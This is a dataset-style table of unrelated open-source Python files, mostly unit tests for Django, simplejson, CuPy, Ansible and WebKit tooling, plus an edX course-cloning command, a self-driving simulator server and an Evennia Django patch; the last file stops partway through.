| repo_name (stringlengths 5-100) | ref (stringlengths 12-67) | path (stringlengths 4-244) | copies (stringlengths 1-8) | content (stringlengths 0-1.05M, ⌀ = nulls) |
|---|---|---|---|---|
kcpawan/django
|
refs/heads/master
|
tests/timezones/urls.py
|
406
|
from django.conf.urls import url
from . import admin as tz_admin # NOQA: register tz_admin
urlpatterns = [
url(r'^admin/', tz_admin.site.urls),
]
|
otfbot/otfbot
|
refs/heads/master
|
otfbot/plugins/remoteCliServer/control.py
|
1
|
# This file is part of OtfBot.
#
# OtfBot is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# OtfBot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with OtfBot; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# (c) 2009 Robert Weidlich
#
# This class basically has to provide a wrapper around controlInterface
|
trevornelson/squeeklights
|
refs/heads/master
|
simplejson/tests/test_item_sort_key.py
|
140
|
from unittest import TestCase
import simplejson as json
from operator import itemgetter
class TestItemSortKey(TestCase):
def test_simple_first(self):
a = {'a': 1, 'c': 5, 'jack': 'jill', 'pick': 'axe', 'array': [1, 5, 6, 9], 'tuple': (83, 12, 3), 'crate': 'dog', 'zeak': 'oh'}
self.assertEqual(
'{"a": 1, "c": 5, "crate": "dog", "jack": "jill", "pick": "axe", "zeak": "oh", "array": [1, 5, 6, 9], "tuple": [83, 12, 3]}',
json.dumps(a, item_sort_key=json.simple_first))
def test_case(self):
a = {'a': 1, 'c': 5, 'Jack': 'jill', 'pick': 'axe', 'Array': [1, 5, 6, 9], 'tuple': (83, 12, 3), 'crate': 'dog', 'zeak': 'oh'}
self.assertEqual(
'{"Array": [1, 5, 6, 9], "Jack": "jill", "a": 1, "c": 5, "crate": "dog", "pick": "axe", "tuple": [83, 12, 3], "zeak": "oh"}',
json.dumps(a, item_sort_key=itemgetter(0)))
self.assertEqual(
'{"a": 1, "Array": [1, 5, 6, 9], "c": 5, "crate": "dog", "Jack": "jill", "pick": "axe", "tuple": [83, 12, 3], "zeak": "oh"}',
json.dumps(a, item_sort_key=lambda kv: kv[0].lower()))
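# A minimal usage sketch mirroring the tests above (simple_first sorts
# scalar values before containers, then alphabetically by key):
#
#     import simplejson as json
#     json.dumps({'b': [1], 'a': 1}, item_sort_key=json.simple_first)
#     # -> '{"a": 1, "b": [1]}'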
|
tscohen/chainer
|
refs/heads/master
|
tests/cupy_tests/math_tests/test_misc.py
|
4
|
import unittest
import numpy
from cupy import testing
@testing.gpu
class TestMisc(unittest.TestCase):
_multiprocess_can_split_ = True
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(atol=1e-5)
def check_unary(self, name, xp, dtype, no_bool=False):
if no_bool and numpy.dtype(dtype).char == '?':
return numpy.int_(0)
a = testing.shaped_arange((2, 3), xp, dtype)
return getattr(xp, name)(a)
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(atol=1e-5)
def check_binary(self, name, xp, dtype, no_bool=False):
if no_bool and numpy.dtype(dtype).char == '?':
return numpy.int_(0)
a = testing.shaped_arange((2, 3), xp, dtype)
b = testing.shaped_reverse_arange((2, 3), xp, dtype)
return getattr(xp, name)(a, b)
@testing.for_dtypes(['?', 'b', 'h', 'i', 'q', 'e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
def check_unary_negative(self, name, xp, dtype, no_bool=False):
if no_bool and numpy.dtype(dtype).char == '?':
return numpy.int_(0)
a = xp.array([-3, -2, -1, 1, 2, 3], dtype=dtype)
return getattr(xp, name)(a)
@testing.for_float_dtypes()
@testing.numpy_cupy_array_equal()
def check_binary_nan(self, name, xp, dtype):
a = xp.array([-3, numpy.NAN, -1, numpy.NAN, 0, numpy.NAN, 2],
dtype=dtype)
b = xp.array([numpy.NAN, numpy.NAN, 1, 0, numpy.NAN, -1, -2],
dtype=dtype)
return getattr(xp, name)(a, b)
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_clip1(self, xp, dtype):
a = testing.shaped_arange((2, 3, 4), xp, dtype)
return a.clip(3, 13)
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_clip2(self, xp, dtype):
a = testing.shaped_arange((2, 3, 4), xp, dtype)
a_min = xp.array([3, 4, 5, 6], dtype=dtype)
a_max = xp.array([[10], [9], [8]], dtype=dtype)
return a.clip(a_min, a_max)
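# Broadcasting note: a_min (shape (4,)) applies per element of the last
# axis, while a_max (shape (3, 1)) varies along the middle axis of the
# (2, 3, 4) array.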
def test_sqrt(self):
self.check_unary('sqrt')
def test_square(self):
self.check_unary('square')
def test_absolute(self):
self.check_unary('absolute')
def test_absolute_negative(self):
self.check_unary_negative('absolute')
def test_sign(self):
self.check_unary('sign', no_bool=True)
def test_sign_negative(self):
self.check_unary_negative('sign', no_bool=True)
def test_maximum(self):
self.check_binary('maximum')
def test_maximum_nan(self):
self.check_binary_nan('maximum')
def test_minimum(self):
self.check_binary('minimum')
def test_minimum_nan(self):
self.check_binary_nan('minimum')
def test_fmax(self):
self.check_binary('fmax')
def test_fmax_nan(self):
self.check_binary_nan('fmax')
def test_fmin(self):
self.check_binary('fmin')
def test_fmin_nan(self):
self.check_binary_nan('fmin')
|
lenarother/moderna
|
refs/heads/master
|
tests/test_analyze/test_chain_connectivity.py
|
1
|
from unittest import main, TestCase
from Bio.PDB.PDBParser import PDBParser
from moderna.analyze.ChainConnectivity import are_residues_connected, \
is_backbone_complete, is_backbone_intact, \
is_phosphate_intact, is_backbone_congested
from moderna.ModernaStructure import ModernaStructure
from moderna.RNAResidue import RNAResidue
from test_data import *
class ChainConnectivityTests(TestCase):
def setUp(self):
"""Loads a structure to start with."""
self.t = ModernaStructure('file',MINI_TEMPLATE)
def test_is_connected_to_true(self):
"""The 3'O (n) and P (n+1) must be close together."""
connected = are_residues_connected(self.t['4'], self.t['5'])
self.assertTrue(connected)
def test_is_connected_to_false(self):
"""The 3'O (n) and P (n+1) must be close together."""
connected = are_residues_connected(self.t['4'], self.t['6'])
self.assertFalse(connected)
def test_is_connected_reverse(self):
"""Reverse order of residues changes the result."""
connected = are_residues_connected(self.t['5'], self.t['4'])
self.assertFalse(connected)
class ResidueIntegrityTests(TestCase):
def setUp(self):
"""Loads the A residue to start with."""
self.a=PDBParser().get_structure('test_struc',A_RESIDUE)[0].child_list[0].child_list[0]
self.chain=PDBParser().get_structure('test_struc',MINI_TEMPLATE)[0].child_list[0]
def test_is_backbone_complete(self):
"""Complete backbone atoms are recognized."""
for resi in self.chain:
resi = RNAResidue(resi)
self.assertTrue(is_backbone_complete(resi))
def test_backbone_incomplete(self):
"""Negative example with missing backbone atoms."""
chain=PDBParser().get_structure('test_struc',INCOMPLETE_BACKBONE)[0].child_list[0]
for resi in chain:
resi = RNAResidue(resi)
self.assertFalse(is_backbone_complete(resi))
def test_is_backbone_intact(self):
"""Check all kinds of backbone discontinuities in one residue."""
chain=PDBParser().get_structure('test_struc',BROKEN_BACKBONE)[0].child_list[0]
residues = [r for r in chain]
for resi in residues[:5]:
mr = RNAResidue(resi)
self.assertFalse(is_backbone_intact(mr))
mr = RNAResidue(chain[6])
self.assertTrue(is_backbone_intact(mr))
def test_is_backbone_intact_5p3p(self):
"""Check all kinds of backbone discontinuities in one residue."""
chain=PDBParser().get_structure('test_struc',BROKEN_BACKBONE)[0].child_list[0]
residues = [r for r in chain]
result_5p = []
result_3p = []
for resi in residues[:6]:
mr = RNAResidue(resi)
result_5p.append(is_backbone_intact(mr, mode="5'"))
result_3p.append(is_backbone_intact(mr, mode="3'"))
self.assertEqual(result_5p, [False, False, False, False, True, True])
self.assertEqual(result_3p, [True, True, True, False, False, True])
def test_is_phosphate_intact(self):
"""Check whether OP1 and OP2 are in place"""
chain=PDBParser().get_structure('test_struc',BB_MESSED_UP)[0].child_list[0]
resi1 = RNAResidue(chain[('H_c ', 32, ' ')])
resi2 = RNAResidue(chain[(' ', 33, ' ')])
self.assertTrue(is_phosphate_intact(resi1))
self.assertFalse(is_phosphate_intact(resi2))
def test_is_backbone_congested(self):
"""Check whether backbone atoms clash into rest of the structure."""
resi = RNAResidue(self.chain.child_list[2])
self.assertFalse(is_backbone_congested(resi))
# now check a structure where the backbone clashes into O2'
chain=PDBParser().get_structure('test_struc', BB_MESSED_UP)[0].child_list[0]
resi = RNAResidue(chain[('H_c ', 32, ' ')])
self.assertTrue(is_backbone_congested(resi))
resi = RNAResidue(chain[(' ', 33, ' ')])
self.assertTrue(is_backbone_congested(resi))
if __name__ == '__main__':
main()
|
michalfaber/CarND-Behavioral-Cloning
|
refs/heads/master
|
drive.py
|
1
|
import argparse
import base64
import json
import cv2
import numpy as np
import socketio
import eventlet
import eventlet.wsgi
import time
from PIL import Image
from PIL import ImageOps
from flask import Flask, render_template
from io import BytesIO
from keras.models import model_from_json
from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array
# Fix error with Keras and TensorFlow
import tensorflow as tf
tf.python.control_flow_ops = tf
sio = socketio.Server()
app = Flask(__name__)
model = None
prev_image_array = None
def preprocess(img):
image = (cv2.resize((cv2.cvtColor(img, cv2.COLOR_RGB2HSV))[:, :, 1],
(32, 16))).reshape(1, 16, 32, 1)
return image
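# Shape sketch (assuming the simulator's 160x320 RGB frames): keep only the
# HSV saturation channel, resize to 32x16, then add batch and channel dims:
#   preprocess(np.zeros((160, 320, 3), dtype=np.uint8)).shape == (1, 16, 32, 1)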
@sio.on('telemetry')
def telemetry(sid, data):
# The current steering angle of the car
steering_angle = data["steering_angle"]
# The current throttle of the car
throttle = data["throttle"]
# The current speed of the car
speed = data["speed"]
# The current image from the center camera of the car
imgString = data["image"]
image = Image.open(BytesIO(base64.b64decode(imgString)))
image_array = np.asarray(image)
transformed_image_array = image_array[None, :, :, :]
# preprocess input image
preprocessed = preprocess(transformed_image_array[0])
# This model currently assumes that the features of the model are just the images. Feel free to change this.
steering_angle = float(model.predict(preprocessed, batch_size=1))
# The driving model currently just outputs a constant throttle. Feel free to edit this.
throttle = 2.0
print(steering_angle, throttle)
send_control(steering_angle, throttle)
@sio.on('connect')
def connect(sid, environ):
print("connect ", sid)
send_control(0, 0)
def send_control(steering_angle, throttle):
sio.emit("steer", data={
'steering_angle': steering_angle.__str__(),
'throttle': throttle.__str__()
}, skip_sid=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Remote Driving')
parser.add_argument('model', type=str,
help='Path to model definition json. Model weights should be on the same path.')
args = parser.parse_args()
with open(args.model, 'r') as jfile:
model = model_from_json(jfile.read())
model.compile("adam", "mse")
weights_file = args.model.replace('json', 'h5')
model.load_weights(weights_file)
# wrap Flask application with engineio's middleware
app = socketio.Middleware(sio, app)
# deploy as an eventlet WSGI server
eventlet.wsgi.server(eventlet.listen(('', 4567)), app)
|
teamfx/openjfx-10-dev-rt
|
refs/heads/master
|
modules/javafx.web/src/main/native/Tools/Scripts/webkitpy/port/image_diff_unittest.py
|
3
|
# Copyright (C) 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit testing base class for Port implementations."""
import unittest
from webkitpy.port.server_process_mock import MockServerProcess
from webkitpy.port.image_diff import ImageDiffer
class FakePort(object):
def __init__(self, server_process_output):
self._server_process_constructor = lambda port, nm, cmd, env: MockServerProcess(lines=server_process_output)
def _path_to_image_diff(self):
return ''
def setup_environ_for_server(self, nm):
return None
class TestImageDiffer(unittest.TestCase):
def test_diff_image_failed(self):
port = FakePort(['diff: 100% failed\n'])
image_differ = ImageDiffer(port)
self.assertEqual(image_differ.diff_image('foo', 'bar', 0.1), ('', 100.0, None))
def test_diff_image_passed(self):
port = FakePort(['diff: 0% passed\n'])
image_differ = ImageDiffer(port)
self.assertEqual(image_differ.diff_image('foo', 'bar', 0.1), (None, 0, None))
|
htwenhe/DJOA
|
refs/heads/master
|
env/Lib/site-packages/django/db/backends/base/validation.py
|
393
|
class BaseDatabaseValidation(object):
"""
This class encapsulates all backend-specific model validation.
"""
def __init__(self, connection):
self.connection = connection
def check_field(self, field, **kwargs):
return []
|
vikas1885/test1
|
refs/heads/master
|
cms/djangoapps/contentstore/management/commands/clone_course.py
|
119
|
"""
Script for cloning a course
"""
from django.core.management.base import BaseCommand, CommandError
from xmodule.modulestore.django import modulestore
from student.roles import CourseInstructorRole, CourseStaffRole
from opaque_keys.edx.keys import CourseKey
from opaque_keys import InvalidKeyError
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from xmodule.modulestore import ModuleStoreEnum
#
# To run from command line: ./manage.py cms clone_course --settings=dev master/300/cough edx/111/foo
#
class Command(BaseCommand):
"""Clone a MongoDB-backed course to another location"""
help = 'Clone a MongoDB backed course to another location'
def course_key_from_arg(self, arg):
"""
Convert the command line arg into a course key
"""
try:
return CourseKey.from_string(arg)
except InvalidKeyError:
return SlashSeparatedCourseKey.from_deprecated_string(arg)
def handle(self, *args, **options):
"Execute the command"
if len(args) != 2:
raise CommandError("clone requires 2 arguments: <source-course_id> <dest-course_id>")
source_course_id = self.course_key_from_arg(args[0])
dest_course_id = self.course_key_from_arg(args[1])
mstore = modulestore()
print("Cloning course {0} to {1}".format(source_course_id, dest_course_id))
with mstore.bulk_operations(dest_course_id):
if mstore.clone_course(source_course_id, dest_course_id, ModuleStoreEnum.UserID.mgmt_command):
print("copying User permissions...")
# purposely avoids auth.add_user b/c it doesn't have a caller to authorize
CourseInstructorRole(dest_course_id).add_users(
*CourseInstructorRole(source_course_id).users_with_role()
)
CourseStaffRole(dest_course_id).add_users(
*CourseStaffRole(source_course_id).users_with_role()
)
|
danieljaouen/ansible
|
refs/heads/devel
|
test/units/module_utils/basic/test_run_command.py
|
86
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division)
__metaclass__ = type
import errno
from itertools import product
from io import BytesIO
import pytest
from ansible.module_utils._text import to_native
class OpenBytesIO(BytesIO):
"""BytesIO with dummy close() method
So that you can inspect the content after close() was called.
"""
def close(self):
pass
@pytest.fixture
def mock_os(mocker):
def mock_os_read(fd, nbytes):
return os._cmd_out[fd].read(nbytes)
def mock_os_chdir(path):
if path == '/inaccessible':
raise OSError(errno.EPERM, "Permission denied: '/inaccessible'")
def mock_os_abspath(path):
if path.startswith('/'):
return path
else:
return os.getcwd.return_value + '/' + path
os = mocker.patch('ansible.module_utils.basic.os')
os._cmd_out = {
# os.read() is returning 'bytes', not strings
mocker.sentinel.stdout: BytesIO(),
mocker.sentinel.stderr: BytesIO(),
}
os.path.expandvars.side_effect = lambda x: x
os.path.expanduser.side_effect = lambda x: x
os.environ = {'PATH': '/bin'}
os.getcwd.return_value = '/home/foo'
os.path.isdir.return_value = True
os.chdir.side_effect = mock_os_chdir
os.read.side_effect = mock_os_read
os.path.abspath.side_effect = mock_os_abspath
yield os
@pytest.fixture
def mock_subprocess(mocker):
def mock_select(rlist, wlist, xlist, timeout=1):
return (rlist, [], [])
fake_select = mocker.patch('ansible.module_utils.basic.select')
fake_select.select.side_effect = mock_select
subprocess = mocker.patch('ansible.module_utils.basic.subprocess')
cmd = mocker.MagicMock()
cmd.returncode = 0
cmd.stdin = OpenBytesIO()
cmd.stdout.fileno.return_value = mocker.sentinel.stdout
cmd.stderr.fileno.return_value = mocker.sentinel.stderr
subprocess.Popen.return_value = cmd
yield subprocess
@pytest.fixture()
def rc_am(mocker, am, mock_os, mock_subprocess):
am.fail_json = mocker.MagicMock(side_effect=SystemExit)
am._os = mock_os
am._subprocess = mock_subprocess
yield am
class TestRunCommandArgs:
# Format is command as passed to run_command, command to Popen as list, command to Popen as string
ARGS_DATA = (
(['/bin/ls', 'a', 'b', 'c'], ['/bin/ls', 'a', 'b', 'c'], '/bin/ls a b c'),
('/bin/ls a " b" "c "', ['/bin/ls', 'a', ' b', 'c '], '/bin/ls a " b" "c "'),
)
# pylint bug: https://github.com/PyCQA/pylint/issues/511
# pylint: disable=undefined-variable
@pytest.mark.parametrize('cmd, expected, shell, stdin',
((arg, cmd_str if sh else cmd_lst, sh, {})
for (arg, cmd_lst, cmd_str), sh in product(ARGS_DATA, (True, False))),
indirect=['stdin'])
def test_args(self, cmd, expected, shell, rc_am):
rc_am.run_command(cmd, use_unsafe_shell=shell)
assert rc_am._subprocess.Popen.called
args, kwargs = rc_am._subprocess.Popen.call_args
assert args == (expected, )
assert kwargs['shell'] == shell
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_tuple_as_args(self, rc_am):
with pytest.raises(SystemExit):
rc_am.run_command(('ls', '/'))
assert rc_am.fail_json.called
class TestRunCommandCwd:
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_cwd(self, mocker, rc_am):
rc_am._os.getcwd.return_value = '/old'
rc_am.run_command('/bin/ls', cwd='/new')
assert rc_am._os.chdir.mock_calls == [mocker.call('/new'), mocker.call('/old'), ]
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_cwd_relative_path(self, mocker, rc_am):
rc_am._os.getcwd.return_value = '/old'
rc_am.run_command('/bin/ls', cwd='sub-dir')
assert rc_am._os.chdir.mock_calls == [mocker.call('/old/sub-dir'), mocker.call('/old'), ]
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_cwd_not_a_dir(self, mocker, rc_am):
rc_am._os.getcwd.return_value = '/old'
rc_am._os.path.isdir.side_effect = lambda d: d != '/not-a-dir'
rc_am.run_command('/bin/ls', cwd='/not-a-dir')
assert rc_am._os.chdir.mock_calls == [mocker.call('/old'), ]
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_cwd_inaccessible(self, rc_am):
with pytest.raises(SystemExit):
rc_am.run_command('/bin/ls', cwd='/inaccessible')
assert rc_am.fail_json.called
args, kwargs = rc_am.fail_json.call_args
assert kwargs['rc'] == errno.EPERM
class TestRunCommandPrompt:
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_prompt_bad_regex(self, rc_am):
with pytest.raises(SystemExit):
rc_am.run_command('foo', prompt_regex='[pP)assword:')
assert rc_am.fail_json.called
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_prompt_no_match(self, mocker, rc_am):
rc_am._os._cmd_out[mocker.sentinel.stdout] = BytesIO(b'hello')
(rc, _, _) = rc_am.run_command('foo', prompt_regex='[pP]assword:')
assert rc == 0
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_prompt_match_wo_data(self, mocker, rc_am):
rc_am._os._cmd_out[mocker.sentinel.stdout] = BytesIO(b'Authentication required!\nEnter password: ')
(rc, _, _) = rc_am.run_command('foo', prompt_regex=r'[pP]assword:', data=None)
assert rc == 257
class TestRunCommandRc:
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_check_rc_false(self, rc_am):
rc_am._subprocess.Popen.return_value.returncode = 1
(rc, _, _) = rc_am.run_command('/bin/false', check_rc=False)
assert rc == 1
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_check_rc_true(self, rc_am):
rc_am._subprocess.Popen.return_value.returncode = 1
with pytest.raises(SystemExit):
rc_am.run_command('/bin/false', check_rc=True)
assert rc_am.fail_json.called
args, kwargs = rc_am.fail_json.call_args
assert kwargs['rc'] == 1
class TestRunCommandOutput:
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_text_stdin(self, rc_am):
(rc, stdout, stderr) = rc_am.run_command('/bin/foo', data='hello world')
assert rc_am._subprocess.Popen.return_value.stdin.getvalue() == b'hello world\n'
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_ascii_stdout(self, mocker, rc_am):
rc_am._os._cmd_out[mocker.sentinel.stdout] = BytesIO(b'hello')
(rc, stdout, stderr) = rc_am.run_command('/bin/cat hello.txt')
assert rc == 0
# module_utils function. On py3 it returns text and py2 it returns
# bytes because it's returning native strings
assert stdout == 'hello'
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_utf8_output(self, mocker, rc_am):
rc_am._os._cmd_out[mocker.sentinel.stdout] = BytesIO(u'Žarn§'.encode('utf-8'))
rc_am._os._cmd_out[mocker.sentinel.stderr] = BytesIO(u'لرئيسية'.encode('utf-8'))
(rc, stdout, stderr) = rc_am.run_command('/bin/something_ugly')
assert rc == 0
# module_utils function. On py3 it returns text and py2 it returns
# bytes because it's returning native strings
assert stdout == to_native(u'Žarn§')
assert stderr == to_native(u'لرئيسية')
|
TheTypoMaster/evennia
|
refs/heads/master
|
evennia/typeclasses/django_new_patch.py
|
6
|
"""
This is a patch of django.db.models.base.py:__new__, to allow for the
proxy system to allow multiple inheritance when both parents are of
the same base model.
This patch is implemented as per
https://code.djangoproject.com/ticket/11560 and will hopefully be
possibe to remove as it gets adde to django's main branch.
"""
# django patch imports
import sys
import copy
import warnings
from django.apps import apps
from django.db.models.base import ModelBase, subclass_exception
from django.core.exceptions import ObjectDoesNotExist
from django.db.models.options import Options
from django.utils.deprecation import RemovedInDjango19Warning
from django.core.exceptions import MultipleObjectsReturned, FieldError
from django.apps.config import MODELS_MODULE_NAME
from django.db.models.fields.related import OneToOneField
#/ django patch imports
def patched_new(cls, name, bases, attrs):
"Patched version of __new__"
super_new = super(ModelBase, cls).__new__
# Also ensure initialization is only performed for subclasses of Model
# (excluding Model class itself).
parents = [b for b in bases if isinstance(b, ModelBase)]
if not parents:
return super_new(cls, name, bases, attrs)
# Create the class.
module = attrs.pop('__module__')
new_class = super_new(cls, name, bases, {'__module__': module})
attr_meta = attrs.pop('Meta', None)
abstract = getattr(attr_meta, 'abstract', False)
if not attr_meta:
meta = getattr(new_class, 'Meta', None)
else:
meta = attr_meta
base_meta = getattr(new_class, '_meta', None)
# Look for an application configuration to attach the model to.
app_config = apps.get_containing_app_config(module)
if getattr(meta, 'app_label', None) is None:
if app_config is None:
# If the model is imported before the configuration for its
# application is created (#21719), or isn't in an installed
# application (#21680), use the legacy logic to figure out the
# app_label by looking one level up from the package or module
# named 'models'. If no such package or module exists, fall
# back to looking one level up from the module this model is
# defined in.
# For 'django.contrib.sites.models', this would be 'sites'.
# For 'geo.models.places' this would be 'geo'.
msg = (
"Model class %s.%s doesn't declare an explicit app_label "
"and either isn't in an application in INSTALLED_APPS or "
"else was imported before its application was loaded. " %
(module, name))
if abstract:
msg += "Its app_label will be set to None in Django 1.9."
else:
msg += "This will no longer be supported in Django 1.9."
warnings.warn(msg, RemovedInDjango19Warning, stacklevel=2)
model_module = sys.modules[new_class.__module__]
package_components = model_module.__name__.split('.')
package_components.reverse() # find the last occurrence of 'models'
try:
app_label_index = package_components.index(MODELS_MODULE_NAME) + 1
except ValueError:
app_label_index = 1
kwargs = {"app_label": package_components[app_label_index]}
else:
kwargs = {"app_label": app_config.label}
else:
kwargs = {}
new_class.add_to_class('_meta', Options(meta, **kwargs))
if not abstract:
new_class.add_to_class(
'DoesNotExist',
subclass_exception(
str('DoesNotExist'),
tuple(x.DoesNotExist for x in parents if hasattr(x, '_meta') and not x._meta.abstract) or (ObjectDoesNotExist,),
module,
attached_to=new_class))
new_class.add_to_class(
'MultipleObjectsReturned',
subclass_exception(
str('MultipleObjectsReturned'),
tuple(x.MultipleObjectsReturned for x in parents if hasattr(x, '_meta') and not x._meta.abstract) or (MultipleObjectsReturned,),
module,
attached_to=new_class))
if base_meta and not base_meta.abstract:
# Non-abstract child classes inherit some attributes from their
# non-abstract parent (unless an ABC comes before it in the
# method resolution order).
if not hasattr(meta, 'ordering'):
new_class._meta.ordering = base_meta.ordering
if not hasattr(meta, 'get_latest_by'):
new_class._meta.get_latest_by = base_meta.get_latest_by
is_proxy = new_class._meta.proxy
# If the model is a proxy, ensure that the base class
# hasn't been swapped out.
if is_proxy and base_meta and base_meta.swapped:
raise TypeError("%s cannot proxy the swapped model '%s'." % (name, base_meta.swapped))
if getattr(new_class, '_default_manager', None):
if not is_proxy:
# Multi-table inheritance doesn't inherit default manager from
# parents.
new_class._default_manager = None
new_class._base_manager = None
else:
# Proxy classes do inherit parent's default manager, if none is
# set explicitly.
new_class._default_manager = new_class._default_manager._copy_to_model(new_class)
new_class._base_manager = new_class._base_manager._copy_to_model(new_class)
# Add all attributes to the class.
for obj_name, obj in attrs.items():
new_class.add_to_class(obj_name, obj)
# All the fields of any type declared on this model
new_fields = (
new_class._meta.local_fields +
new_class._meta.local_many_to_many +
new_class._meta.virtual_fields
)
field_names = set(f.name for f in new_fields)
# Basic setup for proxy models.
if is_proxy:
base = None
for parent in [kls for kls in parents if hasattr(kls, '_meta')]:
if parent._meta.abstract:
if parent._meta.fields:
raise TypeError("Abstract base class containing model fields not permitted for proxy model '%s'." % name)
else:
continue
#if base is not None: # patch
while parent._meta.proxy: # patch
parent = parent._meta.proxy_for_model # patch
if base is not None and base is not parent: # patch
raise TypeError("Proxy model '%s' has more than one non-abstract model base class." % name)
else:
base = parent
if base is None:
raise TypeError("Proxy model '%s' has no non-abstract model base class." % name)
new_class._meta.setup_proxy(base)
new_class._meta.concrete_model = base._meta.concrete_model
else:
new_class._meta.concrete_model = new_class
# Collect the parent links for multi-table inheritance.
parent_links = {}
for base in reversed([new_class] + parents):
# Conceptually equivalent to `if base is Model`.
if not hasattr(base, '_meta'):
continue
# Skip concrete parent classes.
if base != new_class and not base._meta.abstract:
continue
# Locate OneToOneField instances.
for field in base._meta.local_fields:
if isinstance(field, OneToOneField):
parent_links[field.rel.to] = field
# Do the appropriate setup for any model parents.
for base in parents:
original_base = base
if not hasattr(base, '_meta'):
# Things without _meta aren't functional models, so they're
# uninteresting parents.
continue
parent_fields = base._meta.local_fields + base._meta.local_many_to_many
# Check for clashes between locally declared fields and those
# on the base classes (we cannot handle shadowed fields at the
# moment).
for field in parent_fields:
if field.name in field_names:
raise FieldError(
'Local field %r in class %r clashes '
'with field of similar name from '
'base class %r' % (field.name, name, base.__name__)
)
if not base._meta.abstract:
# Concrete classes...
base = base._meta.concrete_model
if base in parent_links:
field = parent_links[base]
elif not is_proxy:
attr_name = '%s_ptr' % base._meta.model_name
field = OneToOneField(base, name=attr_name,
auto_created=True, parent_link=True)
# Only add the ptr field if it's not already present;
# e.g. migrations will already have it specified
if not hasattr(new_class, attr_name):
new_class.add_to_class(attr_name, field)
else:
field = None
new_class._meta.parents[base] = field
else:
# .. and abstract ones.
for field in parent_fields:
new_class.add_to_class(field.name, copy.deepcopy(field))
# Pass any non-abstract parent classes onto child.
new_class._meta.parents.update(base._meta.parents)
# Inherit managers from the abstract base classes.
new_class.copy_managers(base._meta.abstract_managers)
# Proxy models inherit the non-abstract managers from their base,
# unless they have redefined any of them.
if is_proxy:
new_class.copy_managers(original_base._meta.concrete_managers)
# Inherit virtual fields (like GenericForeignKey) from the parent
# class
for field in base._meta.virtual_fields:
if base._meta.abstract and field.name in field_names:
raise FieldError(
'Local field %r in class %r clashes '
'with field of similar name from '
'abstract base class %r' % (field.name, name, base.__name__)
)
new_class.add_to_class(field.name, copy.deepcopy(field))
if abstract:
# Abstract base models can't be instantiated and don't appear in
# the list of models for an app. We do the final setup for them a
# little differently from normal models.
attr_meta.abstract = False
new_class.Meta = attr_meta
return new_class
new_class._prepare()
new_class._meta.apps.register_model(new_class._meta.app_label, new_class)
return new_class
|
abgoyal/zen_u105_kernel
|
refs/heads/master
|
tools/perf/scripts/python/sctop.py
|
11180
|
# system call top
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Periodically displays system-wide system call totals, broken down by
# syscall. If a [comm] arg is specified, only syscalls called by
# [comm] are displayed. If an [interval] arg is specified, the display
# will be refreshed every [interval] seconds. The default interval is
# 3 seconds.
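# Example invocations (hypothetical command lines):
#   perf script -s sctop.py           # all comms, 3 second refresh
#   perf script -s sctop.py 5         # all comms, 5 second refresh
#   perf script -s sctop.py bash 5    # only syscalls made by 'bash'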
import os, sys, thread, time
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
